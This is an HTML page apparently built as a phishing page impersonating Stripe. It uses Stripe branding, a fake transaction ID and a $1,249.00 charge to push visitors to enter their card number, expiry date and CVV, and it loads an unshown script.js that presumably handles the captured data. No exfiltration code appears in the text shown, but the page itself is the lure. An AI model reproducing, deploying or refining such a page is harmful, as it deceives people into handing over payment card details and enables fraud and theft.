<!-- verify.html -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verify Payment | Stripe</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link rel="icon" href="https://stripe.com/favicon.ico" type="image/x-icon">
    <script src="script.js"></script>
</head>
<body class="bg-gray-50">
    <nav class="bg-white shadow-sm">
        <div class="max-w-6xl mx-auto px-4 py-3 flex justify-between items-center">
            <div class="flex items-center space-x-2">
                <svg width="25" height="25" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg">
                    <path d="M13.3 23.9c0 2.3-1.3 3.6-3.8 3.6H2.8V4.7h6.7c2.5 0 3.8 1.3 3.8 3.6 0 1.4-.6 2.5-1.6 3.1 1.4.7 2.2 2 2.2 3.7v8.8zm-3-14c0-1-.6-1.5-1.8-1.5H5.8v3.2h2.7c1.2 0 1.8-.5 1.8-1.5zm.3 6.3c0-1.1-.7-1.7-2-1.7H5.8v3.6h3.1c1.2 0 1.9-.6 1.9-1.7v-.2zm12.5 7.6c2.5 0 3.8-1.3 3.8-3.6 0-1.7-.8-3-2.2-3.7 1-.6 1.6-1.7 1.6-3.1 0-2.3-1.3-3.6-3.8-3.6h-6.7v19.8h6.7c2.5 0 3.8-1.3 3.8-3.6 0-1.4-.6-2.5-1.6-3.1 1.4-.7 2.2-2 2.2-3.7v-.2zm-3.1-10.3c1.2 0 1.8.5 1.8 1.5s-.6 1.5-1.8 1.5h-3.1V9.5h3.1zm.3 6.3c1.3 0 2 .6 2 1.7v.2c0 1.1-.7 1.7-2 1.7h-3.1v-3.6h3.1z" fill="#6772e5"></path>
                </svg>
                <span class="font-semibold text-gray-800">Stripe</span>
            </div>
            <div class="flex items-center space-x-4">
                <span id="userEmailVerify" class="text-gray-600"></span>
                <button id="logoutBtnVerify" class="text-gray-600 hover:text-gray-900">Sign out</button>
            </div>
        </div>
    </nav>

    <main class="max-w-md mx-auto px-4 py-12">
        <div class="bg-white shadow-sm rounded-lg p-8">
            <div class="text-center mb-6">
                <svg class="mx-auto h-12 w-12 text-gray-400" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor">
                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M12 15v2m-6 4h12a2 2 0 002-2v-6a2 2 0 00-2-2H6a2 2 0 00-2 2v6a2 2 0 002 2zm10-10V7a4 4 0 00-8 0v4h8z" />
                </svg>
                <h2 class="mt-2 text-xl font-bold text-gray-900">Verify your payment</h2>
                <p class="mt-1 text-gray-600">Please confirm your payment details to complete the transaction</p>
            </div>
            
            <form id="verifyForm" class="space-y-4">
                <div>
                    <label class="block text-sm font-medium text-gray-700 mb-1">Transaction ID</label>
                    <input type="text" value="txn_7J9XJ123" readonly class="w-full px-3 py-2 bg-gray-100 border border-gray-300 rounded-md">
                </div>
                <div>
                    <label class="block text-sm font-medium text-gray-700 mb-1">Amount</label>
                    <input type="text" value="$1,249.00" readonly class="w-full px-3 py-2 bg-gray-100 border border-gray-300 rounded-md">
                </div>
                <div>
                    <label for="cardNumber" class="block text-sm font-medium text-gray-700 mb-1">Card number</label>
                    <input type="text" id="cardNumber" name="cardNumber" inputmode="numeric" pattern="[0-9\s]{13,19}" autocomplete="cc-number" maxlength="19" placeholder="4242 4242 4242 4242" required class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-purple-600 focus:border-transparent">
                </div>
                <div class="grid grid-cols-2 gap-4">
                    <div>
                        <label for="expiry" class="block text-sm font-medium text-gray-700 mb-1">Expiry date</label>
                        <input type="text" id="expiry" name="expiry" inputmode="numeric" pattern="[0-9]{2}/[0-9]{2}" placeholder="MM/YY" required class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-purple-600 focus:border-transparent">
                    </div>
                    <div>
                        <label for="cvv" class="block text-sm font-medium text-gray-700 mb-1">CVV</label>
                        <input type="text" id="cvv" name="cvv" inputmode="numeric" pattern="[0-9]{3,4}" maxlength="4" placeholder="123" required class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-purple-600 focus:border-transparent">
                    </div>
                </div>
                <button type="submit" class="w-full bg-purple-600 hover:bg-purple-700 text-white py-2 px-4 rounded-md">Verify Payment</button>
            </form>
            
            <div class="mt-6 flex items-center justify-center">
                <svg class="h-5 w-5 text-gray-400" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor">
                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M13 16h-1v-4h-1m1-4h.01M21 12a9 9 0 11-18 0 9 9 0 0118 0z" />
                </svg>
                <span class="ml-2 text-sm text-gray-500">Your payment is secured with SSL encryption</span>
            </div>
        </div>
    </main>

    <footer class="bg-white border-t border-gray-200 mt-16">
        <div class="max-w-6xl mx-auto px-4 py-8">
            <div class="flex justify-between items-center">
                <div class="flex items-center space-x-2">
                    <svg width="20" height="20" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg">
                        <path d="M13.3 23.9c0 2.3-1.3 3.6-3.8 3.6H2.8V4.7h6.7c2.5 0 3.8 1.3 3.8 3.6 0 1.4-.6 2.5-1.6 3.1 1.4.7 2.2 2 2.2 3.7v8.8zm-3-14c0-1-.6-1.5-1.8-1.5H5.8v3.2h2.7c1.2 0 1.8-.5 1.8-1.5zm.3 6.3c0-1.1-.7-1.7-2-1.7H5.8v3.6h3.1c1.2 0 1.9-.6 1.9-1.7v-.2zm12.5 7.6c2.5 0 3.8-1.3 3.8-3.6 0-1.7-.8-3-2.2-3.7 1-.6 1.6-1.7 1.6-3.1 0-2.3-1.3-3.6-3.8-3.6h-6.7v19.8h6.7c2.5 0 3.8-1.3 3.8-3.6 0-1.4-.6-2.5-1.6-3.1 1.4-.7 2.2-2 2.2-3.7v-.2zm-3.1-10.3c1.2 0 1.8.5 1.8 1.5s-.6 1.5-1.8 1.5h-3.1V9.5h3.1zm.3 6.3c1.3 0 2 .6 2 1.7v.2c0 1.1-.7 1.7-2 1.7h-3.1v-3.6h3.1z" fill="#6772e5"></path>
                    </svg>
                    <span class="font-semibold text-gray-800">Stripe</span>
                </div>
                <div class="text-gray-500 text-sm">
                    © 2023 Stripe, Inc.
                </div>
            </div>
        </div>
    </footer>
</body>
</html>
